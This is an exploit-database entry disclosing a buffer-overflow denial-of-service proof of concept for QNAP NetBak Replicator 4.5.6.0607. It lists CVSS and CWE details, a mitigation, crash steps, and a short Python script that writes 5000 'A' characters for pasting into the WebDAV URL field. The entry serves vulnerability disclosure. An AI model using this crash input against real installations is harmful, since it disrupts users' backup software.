QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)

vendor:

NetBak Replicator

by:

Yair Rodríguez Aparicio

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: NetBak Replicator

Affected Version From: 4.5.6.0607

Affected Version To: 4.5.6.0607

Patch Exists: Yes

Related CWE: N/A

CPE: a:qnap:netbak_replicator:4.5.6.0607

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP

2018

QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)

A buffer overflow vulnerability exists in QNAP NetBak Replicator 4.5.6.0607, which can be triggered by sending a specially crafted string of 5000 'A' characters to the 'Dirección URL WebDAV' field. This can cause the application to crash.

Mitigation:

Upgrade to the latest version of QNAP NetBak Replicator.

Source

Exploit-DB raw data:

# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)
# Date: 2018-10-29
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.qnap.com/en/
# Software Link: https://www.qnap.com/en/download
# Version: 4.5.6.0607
# Tested on: Windows XP Profesional Español SP3 x86 

# Steps to Produce the Crash:
# 1.- Run python code : python qnap.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open NetBak Replicator.exe
# 4.- click on Restauración Instantánea
# 5.- Seleccione Origen -> "Ubicacion de red"
# 6.- click on "Dirección URL WebDAV"
# 7.- Paste ClipBoard on "Dirección URL WebDAV"
# 8.- Click "Aceptar".
# 9.- Crashed!
 

 
buffer = "\x41" * 5000
f = open("text.txt", "w")
f.write(buffer)
f.close()